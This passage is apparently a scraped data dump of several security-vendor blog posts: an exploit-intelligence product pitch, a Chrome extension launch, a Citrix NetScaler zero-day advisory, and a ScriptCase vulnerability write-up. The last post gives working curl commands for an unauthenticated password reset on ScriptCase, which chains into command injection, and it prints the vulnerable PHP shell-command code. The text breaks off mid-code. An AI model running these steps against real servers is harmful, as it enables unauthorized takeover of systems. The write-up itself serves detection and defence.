Worse, some public PoCs contain obfuscated payloads or malicious code that can introduce risk during testing.",[18,33571,33572],{},"Security teams often spend valuable time sorting through unreliable or dangerous public exploits. That’s time that could be spent defending their environment.",[18,33574,33575],{},"Initial Access Intelligence (IAI) eliminates that uncertainty by providing:",[22,33577,33578,33581,33584,33587],{},[25,33579,33580],{},"Working exploit code with documented preconditions and execution steps",[25,33582,33583],{},"PCAPs, signatures, and detection rules for immediate SOC and SIEM integration",[25,33585,33586],{},"Reconnaissance queries (Shodan, Censys, FOFA) to map exposure",[25,33588,33589],{},"Validated intelligence built and tested in-house",[18,33591,33592],{},"No more reverse engineering tweets, cleaning up broken GitHub scripts, or risking a sandbox detonation just to verify a PoC. With IAI, you get safe, verified, ready-to-use tools from day one.",[61,33594,33596],{"id":33595},"vulncheck-exploit-availability-vs-cisa-kev","VulnCheck Exploit Availability vs. CISA KEV",[18,33598,33599],{},[68,33600],{":width":10862,"alt":33550,"src":33601},"\u002Fblog\u002Fvulncheck-initial-access\u002Finitial-access-cisa-kev.png",[18,33603,33604],{},"When examining VulnCheck’s Initial Access data and comparing the dates of availability with CISA KEV, we found that 32.1% of the time, VulnCheck’s exploit proof-of-concepts (POCs) and detection artifacts were available before the vulnerability was added to CISA KEV. 50% of the time, VulnCheck's exploit POCs were available within nine days of the vulnerability’s addition to CISA KEV.",[18,33606,33607],{},"Furthermore, there are 150 CVEs we’ve generated exploits and detection artifacts for that have not yet been included in CISA KEV but have confirmed evidence of exploitation. 
This underscores the value of VulnCheck’s early availability of exploits and detection artifacts.",[61,33609,33611],{"id":33610},"vulncheck-vendor-coverage","VulnCheck Vendor Coverage",[18,33613,33614],{},[68,33615],{":width":10862,"alt":33550,"src":33616},"\u002Fblog\u002Fvulncheck-initial-access\u002Finitial-access-vendors.png",[18,33618,33619],{},"The VulnCheck Initial Access team is focused on building exploits and detection artifacts for initial access. This chart highlights many of the common vendors and technologies for which we’ve released initial access artifacts, including network edge devices, open source software, server products, content management systems, file sharing platforms, ICS\u002FOT devices and more.",[61,33621,33623],{"id":33622},"our-curation-picks-the-right-targets","Our Curation Picks the Right Targets",[18,33625,33626],{},"87.2% of IAI CVEs eventually had public exploits developed - proof that VulnCheck's prioritization focuses on what truly matters.",[61,33628,33630],{"id":33629},"the-timing-advantage","The Timing Advantage",[18,33632,33633],{},"IAI isn't just early, it’s strategic. 
Here’s how the 383 CVEs in our dataset break down:",[22,33635,33636,33639,33642,33645],{},[25,33637,33638],{},"8.4%: No public PoC available at the time of IAI delivery",[25,33640,33641],{},"42.0%: IAI delivered after a public PoC, but before any known public weaponized tooling (e.g., Metasploit)",[25,33643,33644],{},"15.1%: IAI delivered before or at the same time as the public PoC",[25,33646,33647],{},"34.5%: IAI delivered after public sources, but included validated exploits, detections, and artifacts",[61,33649,33651],{"id":33650},"real-world-success-stories","Real-World Success Stories",[22,33653,33654,33657,33660,33663],{},[25,33655,33656],{},"CVE-2025-23006: A SonicWall SMA1000 vulnerability confirmed as exploited via CISA KEV, with VulnCheck as the only exploit source.",[25,33658,33659],{},"CVE-2024-40891 and CVE-2024-40890: Zyxel Gateway DSL Modem vulnerabilities confirmed as exploited by CISA 214 days after VulnCheck exploit and detection artifact availability.",[25,33661,33662],{},"CVE-2023-27855: A Rockwell Automation ThinManager ThinServer vulnerability, delivered 765 days before public weaponization",[25,33664,33665],{},"CVE-2024-4885: A Progress WhatsUp Gold vulnerability added to CISA KEV 234 days after VulnCheck exploit and detection artifact availability.",[61,33667,33669],{"id":33668},"built-for-action","Built for Action",[18,33671,33672],{},"IAI doesn’t just get you ahead of in-the-wild exploitation; it’s practical for every team:",[22,33674,33675,33681,33687,33693],{},[25,33676,33677,33680],{},[295,33678,33679],{},"Blue Teams",": Customize and test detections, harden systems, and simulate exploitation preemptively",[25,33682,33683,33686],{},[295,33684,33685],{},"Red Teams",": Launch real-world attacks without waiting for public code",[25,33688,33689,33692],{},[295,33690,33691],{},"Vulnerability Management",": Prioritize patching based on active exploitability",[25,33694,33695,33698],{},[295,33696,33697],{},"Security Leadership",": Reduce exposure before CVEs 
become KEV-listed or broadly exploited",[61,33700,33702],{"id":33701},"strategic-takeaways","Strategic Takeaways",[18,33704,33705],{},"While your team is waiting for public PoCs, attackers may already be exploiting\nWhile competitors are analyzing disclosures, your defenses are already in place\nWhile others react to KEV updates, you’ve already patched or blocked exposure\nConclusion\nVulnCheck’s Initial Access dataset doesn’t just provide early access, it provides months of early access to production-ready exploits for vulnerabilities that frequently become exploited in the wild.",[18,33707,33708],{},"In cybersecurity, being reactive is expensive. IAI gives you a sustainable head start.",[18,33710,33711],{},"Want to see how VulnCheck's Initial Access dataset can give your team a competitive edge? Contact us to learn more.",[61,33713,202],{"id":201},[18,33715,205],{},[18,33717,208],{},[18,33719,211,33720,217],{},[47,33721,216],{"href":214,"rel":33722},[51],{"title":219,"searchDepth":220,"depth":220,"links":33724},[33725,33726,33727,33728,33729,33730,33731,33732,33733],{"id":33565,"depth":220,"text":33566},{"id":33595,"depth":220,"text":33596},{"id":33610,"depth":220,"text":33611},{"id":33622,"depth":220,"text":33623},{"id":33629,"depth":220,"text":33630},{"id":33650,"depth":220,"text":33651},{"id":33668,"depth":220,"text":33669},{"id":33701,"depth":220,"text":33702},{"id":201,"depth":220,"text":202},"2025-09-11","IAI delivers production-ready, validated exploits and detections for vulnerabilities most likely to be exploited for initial access and most likely to be added to CISA’s Known Exploited Vulnerabilities (KEV) 
catalog.",{"slug":33737},"vulncheck-initial-access","\u002Fblog\u002Fvulncheck-initial-access",{"title":33537,"description":33735},"blog\u002Fvulncheck-initial-access",[1281,1279],"1WI9RqNnYMPhmqn0F44qVhssxSeSSxm4ElJ_c8_1j1Q",{"id":33744,"title":3355,"articles":33745,"authors":33746,"body":33748,"date":33967,"description":3356,"extension":234,"image":7,"link":7,"meta":33968,"navigation":237,"path":33969,"seo":33970,"series":7,"stem":33971,"subtype":7,"tags":33972,"__hash__":33974},"blog\u002Fblog\u002Fvulncheck-insights-chrome-extension.md",[],[33747],{"name":3256,"avatar":3257,"link":3258,"linkName":3259},{"type":15,"value":33749,"toc":33960},[33750,33759,33761,33765,33771,33774,33777,33780,33794,33801,33804,33810,33813,33820,33826,33829,33840,33846,33849,33863,33866,33872,33878,33881,33884,33887,33893,33899,33906,33913,33916,33921,33927,33930,33933,33935,33937,33939,33958],[47,33751,33754],{"href":33752,"target":33753},"https:\u002F\u002Fhubs.la\u002FQ03Hq45j0","blank",[33755,33756],"prose-img",{":zoom":5971,"alt":33757,"src":33758},"VulnCheck Insights on Chrome Store","\u002Fblog\u002Fvulncheck-insights-chrome-extension\u002Fchrome-store.png",[1823,33760],{},[263,33762],{":list":33763,"ico":33764,"title":20},"[\"VulnCheck is launching its new VulnCheck Insights capability for all Community and Commercial customers. 
The extension is now available on the Google Chrome Store.\",\"VulnCheck Insights is a Chrome extension that enables teams to immediately access critical CVE intelligence with just a hover prior to drill-down into the specific CVE or group of CVEs.\",\"VulnCheck Insights is the first browser extension to deliver exploit intelligence that consistently beats NVD and CISA KEV, giving defenders the earliest actionable context.\",\"View a walkthrough of installation and how to use the extension on our YouTube Channel.\"]","i-mdi-check-bold",[18,33766,33767],{},[68,33768],{"alt":33769,"src":33770},"chrome store","\u002Fblog\u002Fvulncheck-insights-chrome-extension\u002Fscreenshot-1.png",[18,33772,33773],{},"Introducing “VulnCheck Insights”, the in-your-browser version of VulnCheck’s exploit intelligence. Instead of bouncing between tabs, you now get instant, current context the moment a CVE appears on your screen. We built it with the community in mind, making it easier to quickly see whether a vulnerability is being exploited without extra friction. Having the right information exactly where you need it feels magical. It delivers faster, smoother, and more authoritative vulnerability analysis while keeping you in your flow.",[18,33775,33776],{},"While that might sound like a throwback to the days of toolbars, pop-ups, and FarmVille, I think this is actually where the future’s headed. Performing A Google™ just isn’t what it used to be.",[18,33778,33779],{},"Here’s my workflow before:",[22,33781,33782,33785,33788,33791],{},[25,33783,33784],{},"Google the CVE.",[25,33786,33787],{},"Get the NVD link.",[25,33789,33790],{},"Wait for the page to load.",[25,33792,33793],{},"Stare at the page and realize…This tells me basically nothing.",[18,33795,33796,33797,33800],{},"Sure, I could ask one of the robots (ChatGPT, Claude, etc…), but they’ve been confidently wrong enough times that I don’t trust them when it really counts. 
What I want to know is straightforward: ",[295,33798,33799],{},"where is this CVE in the exploitation lifecycle?"," Do we know almost nothing, or is this thing actively fueling a botnet?",[18,33802,33803],{},"Why not just bring that answer right into the browser? Not just any answer either. The data behind VulnCheck Insights is comprehensive and timely, often surfacing exploitation intelligence weeks before it appears in places like NVD or even CISA’s KEV list. Not only are you keeping your workflow smooth, you are staying ahead of the curve with intelligence that outpaces the usual industry sources.",[61,33805,33807],{"id":33806},"a-little-origin-story",[295,33808,33809],{},"A Little Origin Story",[18,33811,33812],{},"This idea came together fast because our team saw the same pain point. Everywhere you look online, articles, advisories, and GitHub repos, CVEs are scattered like glitter. Unless you’re blessed with a photographic memory (or a non-dyslexic brain that can keep CVE-2025-5335 straight from CVE-2025-5353), you end up searching, clicking, waiting, and frustrated.",[18,33814,33815,33816,33819],{},"One of our engineers realized this was a quick win for VulnCheck data. 
Why force people into the “open tab → search → parse → repeat” loop when the answer could just ",[1131,33817,33818],{},"show up"," while you’re reading?",[61,33821,33823],{"id":33822},"gain-intelligence-without-leaving-the-page",[295,33824,33825],{},"Gain Intelligence without Leaving the Page",[18,33827,33828],{},"Here’s the rundown:",[22,33830,33831,33834,33837],{},[25,33832,33833],{},"You install the extension from the Chrome Web Store.",[25,33835,33836],{},"You insert your VulnCheck token into the settings.",[25,33838,33839],{},"Then you browse like normal.",[18,33841,33842],{},[68,33843],{"alt":33844,"src":33845},"screenshot-2","\u002Fblog\u002Fvulncheck-insights-chrome-extension\u002Fscreeshot-2.png",[18,33847,33848],{},"From there, the extension quietly highlights things like:",[22,33850,33851,33857],{},[25,33852,33853,33856],{},[295,33854,33855],{},"CVEs"," → you’ll see VulnCheck’s exploitation intel right there.",[25,33858,33859,33862],{},[295,33860,33861],{},"CPEs & PURLs"," → you’ll see how many CVEs are tied to them.",[18,33864,33865],{},"Hover, click, done. You don’t leave the page, you don’t lose your train of thought, you just get the intel you actually need.",[18,33867,33868],{},[68,33869],{"alt":33870,"src":33871},"13fb50ab-64c0-4f40-81c7-e959a05caeed.png","\u002Fblog\u002Fvulncheck-insights-chrome-extension\u002F13fb50ab-64c0-4f40-81c7-e959a05caeed.png",[61,33873,33875],{"id":33874},"see-what-vulnerabilities-matter-faster",[295,33876,33877],{},"See What Vulnerabilities Matter Faster!",[18,33879,33880],{},"Because speed matters.",[18,33882,33883],{},"When your CISO pings you a Hacker News link and asks about CVE-2025-43068, you don’t want to stall for half a day. You want to look like the wizard who already knows the answer and now you can.",[18,33885,33886],{},"Also, it keeps VulnCheck data in your natural workflow instead of buried in yet another tab (though, please, keep us open in a tab anyways! 
;) ).",[18,33888,33889],{},[68,33890],{"alt":33891,"src":33892},"screenshot-3","\u002Fblog\u002Fvulncheck-insights-chrome-extension\u002Fscreenshot-3.png",[61,33894,33896],{"id":33895},"where-to-grab-it",[295,33897,33898],{},"Where To Grab It",[18,33900,33901,33902,15050],{},"👉 Install VulnCheck Insights on Chrome [",[47,33903,33904],{"href":33904,"rel":33905},"https:\u002F\u002Fchromewebstore.google.com\u002Fdetail\u002Fvulncheck-insights\u002Fialmnppnmajmaeibknkgfihffkobnogp",[51],[18,33907,33908,33909,15050],{},"👉 Check out the docs [",[47,33910,33911],{"href":33911,"rel":33912},"https:\u002F\u002Fdocs.vulncheck.com\u002Ftools\u002Finsights",[51],[18,33914,33915],{},"And if you send us feedback, we’ll look at other browsers too. (Except Internet Explorer. May it rest in peace.)",[33917,33918],"youtube-video",{"id":33919,"title":33920},"8eu-rzk9uys","VulnCheck Insights Walkthrough",[61,33922,33924],{"id":33923},"the-short-version",[295,33925,33926],{},"The Short Version",[18,33928,33929],{},"We got tired of Googling CVEs and getting half-baked answers. We built VulnCheck Insights, a Chrome extension that puts vulnerability and exploitation intelligence right into the browser, right where you need it.",[18,33931,33932],{},"Install it. Use it. 
Show off to your co-workers when you answer their CVE question in minutes instead of hours.",[1920,33934,202],{"id":201},[18,33936,205],{},[18,33938,208],{},[18,33940,33941,33942,33945,33946,1240,33949,1246,33952,1255,33955,1260],{},"Sign up on our website today to get free access to our ",[47,33943,1233],{"href":10806,"rel":33944},[51],", enjoy our ",[47,33947,1239],{"href":1237,"rel":33948},[51],[47,33950,1245],{"href":1243,"rel":33951},[51],[47,33953,1251],{"href":1249,"rel":33954},[51],[47,33956,216],{"href":1258,"rel":33957},[51],[1920,33959],{"id":219},{"title":219,"searchDepth":220,"depth":220,"links":33961},[33962,33963,33964,33965,33966],{"id":33806,"depth":220,"text":33809},{"id":33822,"depth":220,"text":33825},{"id":33874,"depth":220,"text":33877},{"id":33895,"depth":220,"text":33898},{"id":33923,"depth":220,"text":33926},"2025-09-08",{},"\u002Fblog\u002Fvulncheck-insights-chrome-extension",{"title":3355,"description":3356},"blog\u002Fvulncheck-insights-chrome-extension",[33973,33173],"VulnCheck Insights","KeKPv1MhbqzkuhX-3Pz85b8oCw8AfpnPYf5wKa93uVo",{"id":33976,"title":30358,"articles":33977,"authors":34005,"body":34007,"date":33981,"description":34212,"extension":234,"image":7,"link":7,"meta":34213,"navigation":34214,"path":34215,"seo":34216,"series":7,"stem":34217,"subtype":7,"tags":34218,"__hash__":34219},"blog\u002Fblog\u002Fnew-citrix-netscaler-zero-day-vulnerability-exploited-in-the-wild.md",[33978,33982,33985,33988,33993,33997,34000],{"title":33979,"source":33345,"link":33980,"date":33981},"NetScaler ADC\u002FGateway zero-day exploited by attackers (CVE-2025-7775) – updated!","https:\u002F\u002Fwww.helpnetsecurity.com\u002F2025\u002F08\u002F26\u002Fnetscaler-adc-gateway-zero-day-exploited-by-attackers-cve-2025-7775\u002F","2025-08-26",{"title":33983,"source":3500,"link":33984,"date":33981},"Three new Citrix NetScaler zero-days under active 
exploitation","https:\u002F\u002Fwww.computerweekly.com\u002Fnews\u002F366629825\u002FThree-new-Citrix-NetScaler-zero-days-under-active-exploitation",{"title":33986,"source":19479,"link":33987,"date":33981},"Citrix NetScaler Devices Yet Again Under Attack","https:\u002F\u002Fwww.bankinfosecurity.com\u002Fcitrix-netscaler-devices-yet-again-under-attack-a-29301",{"title":33989,"source":33990,"link":33991,"date":33992},"Well look here! Another Netscaler 0day is getting exploited","The News Stack","https:\u002F\u002Fwww.thestack.technology\u002Fwell-look-here-another-netscaler-0day-is-getting-exploited\u002F","2025-08-27",{"title":33994,"source":33995,"link":33996,"date":33992},"Citrix patches critical zero-day, two other flaws","SC Mag","https:\u002F\u002Fwww.scworld.com\u002Fnews\u002Fcitrix-patches-critical-zero-day-two-other-flaws",{"title":33998,"source":25048,"link":33999,"date":33992},"Patch now! Citrix addresses latest NetScaler zero-day, exploitation underway","https:\u002F\u002Fwww.cyberdaily.au\u002Fsecurity\u002F12554-patch-now-citrix-addresses-latest-netscaler-zero-day-exploitation-underway",{"title":34001,"source":34002,"link":34003,"date":34004},"Enterprises need to patch these Citrix flaws now","ITPro Today","https:\u002F\u002Fwww.itpro.com\u002Fsecurity\u002Fenterprises-need-to-patch-these-citrix-flaws-now","2025-09-01",[34006],{"name":256,"link":258,"avatar":257,"linkName":219},{"type":15,"value":34008,"toc":34207},[34009,34024,34033,34061,34078,34087,34107,34111,34140,34142,34148,34162,34168,34170,34190],[22,34010,34011,34014,34021],{},[25,34012,34013],{},"Citrix disclosed three new vulnerabilities affecting Citrix NetScaler ADC and NetScaler Gateway",[25,34015,34016,34017,34020],{},"The highest-severity vulnerability, ",[47,34018,32546],{"href":32544,"rel":34019},[51],", has been exploited in the wild",[25,34022,34023],{},"The disclosure also includes a new vulnerability in the NetScaler management interface, which should not be exposed to the 
internet and should be prioritized alongside the more severe issues",[18,34025,34026,34027,34032],{},"On August 26, 2025, Cloud Software Group ",[47,34028,34031],{"href":34029,"rel":34030},"https:\u002F\u002Fsupport.citrix.com\u002Fsupport-home\u002Fkbsearch\u002Farticle?articleNumber=CTX694938",[51],"disclosed three new vulnerabilities"," in Citrix NetScaler ADC and NetScaler Gateway. The most severe of these, CVE-2025-7775, has been exploited in the wild.",[22,34034,34035,34045,34053],{},[25,34036,34037,34040,34041],{},[47,34038,32546],{"href":32544,"rel":34039},[51]," (CVSS v4: 9.2): A memory overflow vulnerability that allows for remote code execution and\u002For denial of service in various NetScaler ",[47,34042,34044],{"href":34029,"rel":34043},[51],"configurations",[25,34046,34047,34052],{},[47,34048,34051],{"href":34049,"rel":34050},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2025-7776",[51],"CVE-2025-7776"," (CVSS v4: 8.8): A memory overflow vulnerability leading to unpredictable or erroneous behavior and denial of service in NetScalers configured as Gateways with PCoIP Profiles bounded to them",[25,34054,34055,34060],{},[47,34056,34059],{"href":34057,"rel":34058},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2025-8424",[51],"CVE-2025-8424"," (CVSS v4: 8.7): An improper access control vulnerability in the NetScaler Management Interface; requires access to NSIP, Cluster Management IP, or local GSLB Site IP or SNIP with Management Access",[18,34062,34063,34064,34069,34070,34073,34074,59],{},"Roughly 14,300 Citrix NetScaler instances ",[47,34065,34068],{"href":34066,"rel":34067},"https:\u002F\u002Fwww.shodan.io\u002Fsearch?query=http.title%3A%22Citrix+Gateway%22+%2Bssl%3A%22O%3D%22",[51],"were exposed"," to the public internet at time of disclosure (August 26). 
",[47,34071,32546],{"href":32544,"rel":34072},[51]," has been added to the ",[47,34075,34077],{"href":1231,"rel":34076},[51],"VulnCheck KEV list",[18,34079,34080,34081,34086],{},"Memory corruption vulnerabilities like CVE-2025-7775 and CVE-2025-7776 can be tricky to exploit and on the whole tend to be used by state-sponsored or other skilled adversaries in targeted attacks rather than leveraged by commodity attackers broadly. Another recent Citrix NetScaler vulnerability VulnCheck research has tracked, ",[47,34082,34085],{"href":34083,"rel":34084},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2025-6543",[51],"CVE-2025-6543",", has a description almost identical to CVE-2025-7775 (though CVE-2025-6543 has a narrower range of vulnerable configurations) and has yet to see exploitation at scale despite being on VulnCheck KEV since June 25.",[18,34088,34089,34090,34095,34096,10515,34101,34106],{},"While the Citrix advisory only explicitly mentions active exploitation of CVE-2025-7775, management interfaces for firewalls and security gateways have been ",[47,34091,34094],{"href":34092,"rel":34093},"https:\u002F\u002Farcticwolf.com\u002Fresources\u002Fblog\u002Fconsole-chaos-targets-fortinet-fortigate-firewalls\u002F",[51],"targeted"," en masse in recent ",[47,34097,34100],{"href":34098,"rel":34099},"https:\u002F\u002Fwww.cyber.gc.ca\u002Fen\u002Falerts-advisories\u002Fsecuring-palo-alto-management-interfaces-exploitation",[51],"threat",[47,34102,34105],{"href":34103,"rel":34104},"https:\u002F\u002Fthehackernews.com\u002F2025\u002F05\u002Fsonicwall-confirms-active-exploitation.html",[51],"campaigns",". It's likely that exploit chains targeting these vulnerabilities in the future may try to combine an initial access flaw like CVE-2025-7775 with a flaw like CVE-2025-8424 with management interface compromise as a goal. 
Vulnerability response prioritization should include CVE-2025-8424 rather than being limited to the higher-severity (but harder-to-exploit) memory corruption CVEs alone.",[61,34108,34110],{"id":34109},"previous-netscaler-compromises","Previous NetScaler Compromises",[18,34112,34113,34114,34119,34120,1246,34123,1255,34128,34133,34134,34139],{},"The Netherlands' National Cyber Security Centre (NCSC) has a ",[47,34115,34118],{"href":34116,"rel":34117},"https:\u002F\u002Fwww.ncsc.nl\u002Factueel\u002Fnieuws\u002F2025\u002F07\u002F22\u002Fcasus-citrix-kwetsbaarheid",[51],"public advisory"," dated mid-August stating that NetScaler exploits had been used in \"a sophisticated attack that successfully targeted several Dutch organizations.\" Webshells were deployed on compromised devices; NCSC noted that compromised NetScalers were vulnerable to several known issues — namely, ",[47,34121,34085],{"href":34083,"rel":34122},[51],[47,34124,34127],{"href":34125,"rel":34126},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2025-5777",[51],"CVE-2025-5777",[47,34129,34132],{"href":34130,"rel":34131},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2025-5349",[51],"CVE-2025-5349",", the first two of which were exploited as zero-days. NCSC didn't attribute the attacks to a specific adversary; they later released ",[47,34135,34138],{"href":34136,"rel":34137},"https:\u002F\u002Fgithub.com\u002FNCSC-NL\u002Fcitrix-2025",[51],"scripts"," to aid in threat hunting and compromise identification.",[61,34141,1782],{"id":1781},[18,34143,34144,34145,4606],{},"Organizations that use Citrix NetScaler should apply patches urgently and ensure the management interface is not exposed to the internet. 
Fixed versions are below, as indicated in the vendor ",[47,34146,5359],{"href":34029,"rel":34147},[51],[22,34149,34150,34153,34156,34159],{},[25,34151,34152],{},"NetScaler ADC and NetScaler Gateway 14.1-47.48 and later releases",[25,34154,34155],{},"NetScaler ADC and NetScaler Gateway 13.1-59.22 and later releases of 13.1",[25,34157,34158],{},"NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1-37.241 and later releases of 13.1-FIPS and 13.1-NDcPP",[25,34160,34161],{},"NetScaler ADC 12.1-FIPS and 12.1-NDcPP 12.1-55.330 and later releases of 12.1-FIPS and 12.1-NDcPP",[34163,34164,34165],"prose-note",{},[18,34166,34167],{},"Patching vulnerable software alone does not remediate compromises or eject threat actors from systems they have infiltrated",[61,34169,202],{"id":201},[18,34171,33489,34172,1246,34177,34182,34183,34189],{},[47,34173,34175],{"href":32015,"rel":34174},[51],[1131,34176,32017],{},[47,34178,34180],{"href":31538,"rel":34179},[51],[1131,34181,31540],{},", and our ",[47,34184,34186],{"href":31530,"rel":34185},[51],[1131,34187,34188],{},"1H 2025 State of Exploitation"," report.",[18,34191,1228,34192,1234,34195,1240,34198,1246,34201,1255,34204,1260],{},[47,34193,1233],{"href":10806,"rel":34194},[51],[47,34196,1239],{"href":1237,"rel":34197},[51],[47,34199,1245],{"href":1243,"rel":34200},[51],[47,34202,1251],{"href":1249,"rel":34203},[51],[47,34205,216],{"href":1258,"rel":34206},[51],{"title":219,"searchDepth":220,"depth":220,"links":34208},[34209,34210,34211],{"id":34109,"depth":220,"text":34110},{"id":1781,"depth":220,"text":1782},{"id":201,"depth":220,"text":202},"Three new Citrix NetScaler vulnerabilities were disclosed on August 26, including CVE-2025-7775, a fresh zero-day flaw being used in the 
wild",{},{"title":30358},"\u002Fblog\u002Fnew-citrix-netscaler-zero-day-vulnerability-exploited-in-the-wild",{"title":30358,"description":34212},"blog\u002Fnew-citrix-netscaler-zero-day-vulnerability-exploited-in-the-wild",[242,1281],"IYc5w7NMq3pb4t9HUySROrR4Z9Z9oxlsybdof4KlrMI",{"id":34221,"title":34222,"articles":7,"authors":34223,"body":34225,"date":35956,"description":35957,"extension":234,"image":7,"link":7,"meta":35958,"navigation":237,"path":35960,"seo":35961,"series":7,"stem":35962,"subtype":7,"tags":35963,"__hash__":35965},"blog\u002Fblog\u002Fscriptcase-rce.md","ScriptCase - Hunt It, Exploit It, Defend It",[34224],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":34226,"toc":35954},[34227,34230,34232,34250,34254,34257,34260,34267,34273,34284,34295,34301,34318,34324,34335,34341,34344,34347,34357,34364,34375,34378,34387,34390,34399,34405,34411,34420,34423,34429,34432,34438,34453,35105,35108,35350,35356,35362,35365,35479,35482,35527,35534,35677,35680,35682,35685,35691,35702,35707,35711,35714,35858,35868,35874,35877,35883,35892,35894,35900,35902,35932,35949,35951],[263,34228],{":list":34229,"ico":266,"title":20},"[\"Hundreds of ScriptCase instances remain exposed a month after disclosure, with attackers actively scanning for them.\",\"Exploitation is simple, requiring only a few curl commands once a target is found, allowing full remote code execution.\",\"Clear detection paths exist, including version strings, network signatures, and suspicious processes or PHP files in the webroot.\"]",[1920,34231,11648],{"id":11647},[18,34233,34234,34235,34238,34239,982,34244,34249],{},"One month ago, Synacktiv",[1373,34236,34237],{},"^1"," published their disclosure and deep dive on a vulnerability chain affecting ScriptCase. 
The vulnerabilities, [CVE-2025-47227](https://console.vulncheck.com/cve/CVE-2025-47227) and [CVE-2025-47228](https://console.vulncheck.com/cve/CVE-2025-47228), are an unauthenticated password reset and an authenticated command injection that, when chained, give an unauthenticated attacker full remote code execution. And yet, despite public disclosure, functional exploits, and available patches, hundreds of ScriptCase instances remain exposed on the Internet.

## Does This Matter?

That leaves the obvious question: does this matter enough to go hunting?

At VulnCheck, one way we decide whether a vulnerability matters is by looking for targets online. The logic is simple: if there are zero targets online, who cares? If there are many targets online, we care. If it's somewhere between zero and many, it depends.

Naively, we started with a Shodan query of `title:"ScriptCase"`. The results were annoying.

![Shodan query with all honeypots](/blog/scriptcase-rce/honeypots.png)

Annoying because they aren't real ScriptCase servers at all. These are honeypots: Frankenpots that seemingly pollute every single query. We've written about the problem before in [There are Too Many Damn Honeypots](https://www.vulncheck.com/blog/too-many-honeypots), and this is another textbook case.

But the fact that there are honeypots suggests that others care about ScriptCase too. So we grabbed a copy of the software, built a Shodan query[^2] that avoids the decoys, and, in a rare win, even got a Google dork[^3] to work (the AI-slopification of Google has largely destroyed good dorking, so this felt like a small miracle).

![Dork results for ScriptCase](/blog/scriptcase-rce/scriptcase-google-dork.png)

The VulnCheck Initial Access Intelligence team routinely develops queries for Shodan, FOFA, ZoomEye, and Censys to track down vulnerable targets. While building out our fingerprints for ScriptCase on these services, we also found that our friends at [driftnet](https://driftnet.io/) had turned up roughly 2,800 ScriptCase servers exposed to the Internet via their `Scan Content` functionality.

![driftnet results for ScriptCase](/blog/scriptcase-rce/driftnet-search.png)

Finally, it's not just researchers looking for ScriptCase. GreyNoise is tracking[^4] a couple dozen known malicious IPs scanning specifically for `/scriptcase/`. That's proof attackers are on the hunt too.

![GreyNoise sees scanning for ScriptCase](/blog/scriptcase-rce/greynoise-search.png)

At the end of the day, you have all the ingredients needed to answer "does this matter?": there are discoverable targets online, there is a public proof of concept, and attackers are actively looking for these systems. That matters.

## Exploitation

If finding vulnerable ScriptCase servers is straightforward, exploiting them is even easier. Synacktiv's blog and proof-of-concept[^5] go into detail, but it boils down to just a few `curl` commands. No custom tooling required.

The first request establishes a fixed `PHPSESSID`, which we carry through the rest of the chain. (PHP adopts a client-supplied session ID unless `session.use_strict_mode` is enabled, so the later requests can simply reuse the same cookie.)

```console
curl -H "Cookie: PHPSESSID=fixated" -H "Accept-Language: en-us" http://10.9.49.69:8092/scriptcase/prod/lib/php/devel/iface/login.php
```

The second request generates the captcha we need for the password reset. This is probably the one feature that will slow down mass exploitation from tools like Nuclei. Synacktiv's GitHub exploit tries to solve it with OCR (which is incredibly cool!), but success isn't guaranteed.

```console
curl -H "Cookie: PHPSESSID=fixated" -H "Accept-Language: en-us" http://10.9.49.69:8092/scriptcase/prod/lib/php/devel/lib/php/secureimage.php -o /tmp/captcha.png
```

Opening the file reveals the captcha text. On Linux, something like:

```console
xdg-open /tmp/captcha.png
```

![ScriptCase generated captcha](/blog/scriptcase-rce/captcha.png)

With the captcha value in hand, we can reset the password to one of our choosing, as long as it meets the complexity requirements. Below we set the password to `KLRxWQONIp41`. Note that nothing in this request proves ownership of the account named in `email`; the captcha is the only check.

```console
curl -H "Cookie: PHPSESSID=fixated" -H "Accept-Language: en-us" http://10.9.49.69:8092/scriptcase/prod/lib/php/devel/iface/login.php -d "ajax=nm&nm_action=change_pass&email=email@email.com&pass_new=KLRxWQONIp41&pass_conf=KLRxWQONIp41&lang=en-us&captcha=TLEB"
```

Once the reset has gone through, we can navigate to the production environment login page and authenticate with the new credentials.

![ScriptCase authentication prompt](/blog/scriptcase-rce/prod-auth.png)

Once authenticated, we land in the production environment.

![ScriptCase post-authentication in production](/blog/scriptcase-rce/prod-post-auth.png)

With access to the production environment, we can move on to [CVE-2025-47228](https://console.vulncheck.com/cve/CVE-2025-47228), a command injection in the connection creation and testing feature. The injection lives in a modified version of the third-party library ADOdb[^6]. First, the command is built in `$str_command` by concatenating attacker-provided values, with no quoting or validation of any of them:

```php
function getSSHCommand($arr_ssh)
{
   $hosts = "known_hosts";
   if($this->getSO() != 'windows')
   {
       $hosts = "/tmp/known_hosts";
   }
   $str_command = "ssh -o UserKnownHostsFile=". $hosts ." -o StrictHostKeyChecking=no -fNg -L ". $arr_ssh['ssh_localportforwarding'] .":". $arr_ssh['ssh_localserver'] .":". $arr_ssh['ssh_localport'] ." ". $arr_ssh['ssh_user'] ."@". $arr_ssh['ssh_server'];
   if(!empty($arr_ssh['ssh_port']))
   {
       $str_command .= " -p " . $arr_ssh['ssh_port'];
   }
   if(!empty($arr_ssh['ssh_privatecert']))
   {
       $arr_ssh['ssh_privatecert'] = str_replace("\\", "/", $arr_ssh['ssh_privatecert']);

       if(strpos($arr_ssh['ssh_privatecert'], " ")!==false)
       {
           $arr_ssh['ssh_privatecert'] = '"' . $arr_ssh['ssh_privatecert'] . '"';
       }
       $str_command .= " -i " . $arr_ssh['ssh_privatecert'];
   }
   $str_command .= " sleep 60  > ";
   $tmp = "null";
   if($this->getSO() != 'windows')
   {
       $tmp = "/dev/null";
   }
   $str_command .= $tmp;

   return $str_command;
}
```

And then it's executed. Twice, in fact: once inside a `ps aux | grep` pipeline that checks whether the tunnel is already running, and then again via `exec()` to start it. Either call is enough for the injection to fire.

```php
$cmd_qtd_conn_ssh = $str_unset_ld_library.'ps aux | grep "'.trim(str_replace(' > /dev/null','',$this->getSSHCommand($arr_ssh))).'" | grep -v grep | wc -l';
$qtd_conn_ssh = (int)trim(exec($cmd_qtd_conn_ssh));
if($qtd_conn_ssh == 0) {
